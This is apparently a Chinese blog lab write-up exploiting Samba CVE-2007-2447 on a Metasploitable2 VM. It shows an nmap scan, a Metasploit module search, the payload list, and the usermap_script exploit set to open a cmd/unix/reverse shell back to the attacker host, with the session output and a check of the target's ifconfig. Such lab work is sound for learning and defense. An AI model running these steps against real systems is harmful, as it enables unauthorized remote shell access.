Samba远程Shell命令注入执行漏洞(CVE-2007-2447)

产生原因

传递通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行

实验环境

这里使用的目标机是metasploitable2

linux攻击机:192.168.43.113
linux目标机:192.168.43.23

利用攻击

首先对目标机进行扫描,收集可用的服务信息,使用nmap扫描查看系统开放端口和相关的应用程序

msf5 > nmap -sV 192.168.43.23
[*] exec: nmap -sV 192.168.43.23

Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-02 22:22 CST
Nmap scan report for 192.168.43.23
Host is up (0.0012s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec?
513/tcp  open  login?
514/tcp  open  shell?
1099/tcp open  rmiregistry GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13?
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port514-TCP:V=7.70%I=7%D=9/2%Time=5F4FAAAA%P=x86_64-pc-linux-gnu%r(NULL
SF:,2B,"\x01Couldn't\x20get\x20address\x20for\x20your\x20host\x20\(kali\)\SF:n");
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect resultsat https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.39 seconds

可以看到目标机开着Samba 3.x服务,通过search samba 3.x来找到利用模块

msf5 > search samba 3.x

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank       Check  Description
   -   ----                                                 ---------------  ----       -----  -----------
   1   auxiliary/admin/http/intersil_pass_reset             2007-09-10       normal     Yes    Intersil (Boa) HTTPd Basic Authentication Password Reset
   2   auxiliary/admin/smb/samba_symlink_traversal                           normal     No     Samba Symlink Directory Traversal
   3   auxiliary/dos/samba/lsa_addprivs_heap                                 normal     No     Samba lsa_io_privilege_set Heap Overflow
   4   auxiliary/dos/samba/lsa_transnames_heap                               normal     No     Samba lsa_io_trans_names Heap Overflow
   5   auxiliary/dos/samba/read_nttrans_ea_list                              normal     No     Samba read_nttrans_ea_list Integer Overflow
   6   auxiliary/scanner/rsync/modules_list                                  normal     Yes    List Rsync Modules
   7   auxiliary/scanner/smb/smb_uninit_cred                                 normal     Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   8   auxiliary/scanner/ssh/eaton_xpert_backdoor           2018-07-18       normal     Yes    Eaton Xpert Meter SSH Private Key Exposure Scanner
   9   exploit/freebsd/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (*BSD x86)
   10  exploit/linux/http/efw_chpasswd_exec                 2015-06-28       excellent  No     Endian Firewall Proxy Password Change Command Injection
   11  exploit/linux/http/imperva_securesphere_exec         2018-10-08       excellent  Yes    Imperva SecureSphere PWS Command Injection
   12  exploit/linux/http/zenoss_showdaemonxmlconfig_exec   2012-07-30       good       Yes    Zenoss 3 showDaemonXMLConfig Command Execution
   13  exploit/linux/samba/chain_reply                      2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   14  exploit/linux/samba/is_known_pipename                2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
   15  exploit/linux/samba/lsa_transnames_heap              2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   16  exploit/linux/samba/setinfopolicy_heap               2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   17  exploit/linux/samba/trans2open                       2003-04-07       great      No     Samba trans2open Overflow (Linux x86)
   18  exploit/multi/http/joomla_http_header_rce            2015-12-14       excellent  Yes    Joomla HTTP Header Unauthenticated Remote Code Execution
   19  exploit/multi/http/plone_popen2                      2011-10-04       excellent  Yes    Plone and Zope XMLTools Remote Command Execution
   20  exploit/multi/http/rails_xml_yaml_code_exec          2013-01-07       excellent  No     Ruby on Rails XML Processor YAML Deserialization Code Execution
   21  exploit/multi/http/struts2_code_exec_showcase        2017-07-07       excellent  Yes    Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution
   22  exploit/multi/http/struts_code_exec_classloader      2014-03-06       manual     No     Apache Struts ClassLoader Manipulation Remote Code Execution
   23  exploit/multi/http/struts_default_action_mapper      2013-07-02       excellent  Yes    Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
   24  exploit/multi/samba/nttrans                          2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   25  exploit/multi/samba/usermap_script                   2007-05-14       excellent  No     Samba "username map script" Command Execution
   26  exploit/osx/samba/lsa_transnames_heap                2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   27  exploit/osx/samba/trans2open                         2003-04-07       great      No     Samba trans2open Overflow (Mac OS X PPC)
   28  exploit/solaris/samba/lsa_transnames_heap            2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   29  exploit/solaris/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (Solaris SPARC)
   30  exploit/unix/http/quest_kace_systems_management_rce  2018-05-31       excellent  Yes    Quest KACE Systems Management Command Injection
   31  exploit/unix/misc/distcc_exec                        2002-02-01       excellent  Yes    DistCC Daemon Command Execution
   32  exploit/unix/webapp/citrix_access_gateway_exec       2010-12-21       excellent  Yes    Citrix Access Gateway Command Execution
   33  exploit/unix/webapp/joomla_akeeba_unserialize        2014-09-29       excellent  Yes    Joomla Akeeba Kickstart Unserialize Remote Code Execution
   34  exploit/unix/webapp/joomla_contenthistory_sqli_rce   2015-10-23       excellent  Yes    Joomla Content History SQLi Remote Code Execution
   35  exploit/unix/webapp/joomla_media_upload_exec         2013-08-01       excellent  Yes    Joomla Media Manager File Upload Vulnerability
   36  exploit/unix/webapp/phpmyadmin_config                2009-03-24       excellent  No     PhpMyAdmin Config File Code Injection
   37  exploit/windows/browser/awingsoft_web3d_bof          2009-07-10       average    No     AwingSoft Winds3D Player SceneURL Buffer Overflow
   38  exploit/windows/fileformat/ms14_060_sandworm         2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution
   39  exploit/windows/http/apache_modjk_overflow           2007-03-02       great      Yes    Apache mod_jk 1.2.20 Buffer Overflow
   40  exploit/windows/http/ia_webmail                      2003-11-03       average    No     IA WebMail 3.x Buffer Overflow
   41  exploit/windows/http/sambar6_search_results          2003-06-21       normal     Yes    Sambar 6 Search Results Buffer Overflow
   42  exploit/windows/license/calicclnt_getconfig          2005-03-02       average    No     Computer Associates License Client GETCONFIG Overflow
   43  exploit/windows/smb/group_policy_startup             2015-01-26       manual     No     Group Policy Script Execution From Shared Resource
   44  post/linux/gather/enum_configs                                        normal     No     Linux Gather Configurations

使用该漏洞利用模块,然后查看该漏洞利用模块下可供选择的攻击载荷模块

msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show payloads

Compatible Payloads
===================
   #   Name                                Disclosure Date  Rank    Check  Description
   -   ----                                ---------------  ----    -----  -----------
   1   cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   2   cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   3   cmd/unix/bind_inetd                                  normal  No     Unix Command Shell, Bind TCP (inetd)
   4   cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   5   cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   6   cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   7   cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   8   cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   9   cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   10  cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   11  cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   12  cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   13  cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   14  cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   15  cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   16  cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   17  cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   18  cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   19  cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   20  cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   21  cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   22  cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   23  cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   24  cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   25  cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   26  cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   27  cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   28  cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   29  cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   30  cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   31  cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   32  cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   33  cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   34  cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   35  cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)

设置cmd/unix/reverse反向攻击载荷模块
设置目标机IP地址
设置漏洞利用的端口号
设置发动攻击主机IP地址

msf5 exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.43.23
RHOSTS => 192.168.43.23
msf5 exploit(multi/samba/usermap_script) > set RPORT 445
RPORT => 445
msf5 exploit(multi/samba/usermap_script) > set LHOST 192.168.43.113
LHOST => 192.168.43.113
msf5 exploit(multi/samba/usermap_script) > options 

Module options (exploit/multi/samba/usermap_script):
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.43.23    yes       The target address range or CIDR identifier
   RPORT   445              yes       The target port (TCP)

Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.43.113   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:
   Id  Name
   --  ----
   0   Automatic

设置完成我们exploit或者run一下

msf5 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 192.168.43.113:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo oQwX81x659bJ0os8;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "oQwX81x659bJ0os8\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 4 opened (192.168.43.113:4444 -> 192.168.43.23:49794) at 2020-09-02 23:02:57 +0800

msf攻击成功后会获取目标主机的shell,为了验证该shell是目标机的,可以查询主机名、用户名和IP

ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:fa:dd:2a  
          inet addr:192.168.43.23  Bcast:192.168.43.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fefa:dd2a/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2410 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1961 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:190106 (185.6 KB)  TX bytes:138231 (134.9 KB)
          Interrupt:17 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:278 errors:0 dropped:0 overruns:0 frame:0
          TX packets:278 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:110249 (107.6 KB)  TX bytes:110249 (107.6 KB)

可以看到命令已经执行了。

总结

总结:攻击五分钟,搭建两小时。又是朴实而又充实的一天啊!

你可能感兴趣的:(kali,linux,linux,安全,samba,cmd)